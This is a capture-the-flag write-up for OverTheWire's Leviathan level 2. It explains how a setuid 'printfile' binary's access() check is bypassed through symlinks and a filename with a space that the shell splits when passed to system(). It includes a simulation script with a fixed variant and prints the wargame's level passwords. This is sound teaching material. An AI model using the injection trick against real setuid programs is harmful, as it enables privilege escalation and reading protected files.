Level 2 Username: leviathan2 Password: ougahZi8Ta SSH: leviathan.labs.overthewire.org:2223
Note: To solve this level, I had to refer to other blogs to get the solution. I’ve provided the solution here in my words and added my understanding to it.
To solve this level, we first ssh into the Leviathan server as leviathan2 using the credentials provided above. In the home directory there is an executable named "printfile". It takes a file path from the user and prints the file's contents on the console. Let's see what happens if we pass it "/etc/leviathan_pass/leviathan3".
As we can see, the executable responds with "You can't have that file". I then provided a file that we do have the right to read, "/etc/leviathan_pass/leviathan2", and the application prints its contents. To understand the inner workings of the executable, I fired up gdb in two different terminals and set breakpoints at the calls to access@plt (b *main+101) and system@plt (b *main+177). On passing different files to these two instances, we can see that the call to access@plt leaves $eax as 0 when our user has access to the file and as -1 when our user does not. access() evaluates the path against the real user ID (leviathan2), not the effective one, which is why it rejects the password file even though printfile itself runs with leviathan3's privileges. Therefore, to change the course of the program, I set $eax to 0 so that the program continues past the check and does not error out for the time being. For more information on the access function, read this link.
On proceeding further with the program, the executable passes "/bin/cat" along with our filename to the system call. If we do not have access to the file, cat throws a permission error; otherwise, the contents of the file are printed. (Note that a setuid binary started under gdb does not get its elevated privileges, so cat runs as leviathan2 there and cannot read leviathan3's password even with the check patched out.) At this point, I tried creating a temporary file symbolically linked to the password file, hoping that the /bin/cat invoked by system() would not throw any errors since I do have access to the file I created which is linked to the password file; however, that did not work. The reason is that access() follows the symbolic link and checks the target, so the link is rejected exactly like the password file itself. After several attempts at changing the flow of the program by modifying registers and variables in gdb, I couldn't print the file.
At this point, I decided to search for hints and found a few blogs which identified the trick: the symbolic link has to be used in a different way.
As we can see above, I created the following two files:
- "SecurityTimes", a symbolic link to the password file
- "SecurityTimes solution", a regular file whose name contains a space
The exploit works in the following way. We pass the file "SecurityTimes solution" to the printfile executable. It clears the access() check because access() treats the whole string, space included, as a single path, and our user does have access to that file. Next, the program builds the command string "/bin/cat SecurityTimes solution" and hands it to system(), which runs it through /bin/sh. The shell splits the string on the space and invokes cat with two separate arguments, "SecurityTimes" and "solution", as if they were two different files. Since the first one exists, cat prints its contents, and because it is a symbolic link to the password file, that is the password, now read with printfile's privileges rather than ours. We can also create a file named after the second half of the filename, "solution", and put some content in it; once the executable runs, the contents of both files are displayed.
As you can see above, the executable displays our password and the content from our “solution” file.
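To make the mechanism concrete, here is an added shell example; it is not the original post's commands and not the real printfile binary, whose source is not shown here. The stand-in function mimics only the two steps observed in gdb: a check of the whole path string (standing in for access()) followed by the path spliced into a "/bin/cat ..." command string that a shell parses (what system() does). It runs as the current user, so it cannot reproduce the setuid privilege boundary and therefore not the direct-symlink failure; what it shows is the word splitting that gets "SecurityTimes" past the single-path check and into cat as its own argument, next to a variant that hands the path to cat as one argv entry and is immune to the split. The password string and all file names are constructed for the example.

```shell
#!/bin/sh
# Added example, not the original post's commands and not the real printfile.
# printfile_sim mimics only the two observed steps: a readability check on the
# whole path string (like access(path, R_OK)) and system("/bin/cat <path>").
# The real binary's setuid privilege boundary is not reproduced here.

# Stand-in for printfile. [ -r ] checks the whole string as one path; sh -c with
# the path spliced into the command string is what system() does, so the shell
# splits the string on whitespace before cat ever sees it.
printfile_sim() {
    if [ ! -r "$1" ]; then
        echo "You can't have that file"
        return 1
    fi
    sh -c "/bin/cat $1"
}

# Same check, but the path reaches cat as a single argv entry with no shell
# parsing, so the name cannot be split (the access()/open race remains).
printfile_fixed() {
    if [ ! -r "$1" ]; then
        echo "You can't have that file"
        return 1
    fi
    /bin/cat "$1"
}

# Number of words the shell makes out of a path string under the default IFS.
cat_argc() {
    set -- $1
    echo $#
}

# Workspace: a constructed stand-in for /etc/leviathan_pass/leviathan3, the
# symlink "SecurityTimes" pointing at it, the regular file "SecurityTimes
# solution" that passes the check, and "solution" so cat's second argument
# exists too. Prints the directory path.
setup_workspace() {
    ws_dir=$(mktemp -d)
    printf 'the-next-level-password\n' > "$ws_dir/leviathan3"   # constructed, not the real file
    ln -s "$ws_dir/leviathan3" "$ws_dir/SecurityTimes"
    : > "$ws_dir/SecurityTimes solution"
    printf 'solution\n' > "$ws_dir/solution"
    echo "$ws_dir"
}

# Run the trick from inside the workspace, like typing it at the prompt in the
# directory where the files were created. Prints the symlink target and the
# contents of "solution".
run_exploit() {
    (cd "$1" && printfile_sim "SecurityTimes solution")
}

# Same input against the fixed variant: cat reads the empty file
# "SecurityTimes solution" and prints nothing.
run_exploit_fixed() {
    (cd "$1" && printfile_fixed "SecurityTimes solution")
}

if [ "${1:-}" = "demo" ]; then
    ws=$(setup_workspace)
    echo "words cat receives: $(cat_argc 'SecurityTimes solution')"
    run_exploit "$ws"
    rm -rf "$ws"
fi
```

Run it as `sh example.sh demo`. The fixed variant closes the splitting bug only; the check-then-read gap between access() and cat is still a race (the path can be swapped for a symlink in between), and the proper fix for a setuid program is to drop to the real UID before opening, or to read with the same credentials the check used.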
Level 3 Username: leviathan3 Password: Ahdiemoo1j SSH: leviathan.labs.overthewire.org:2223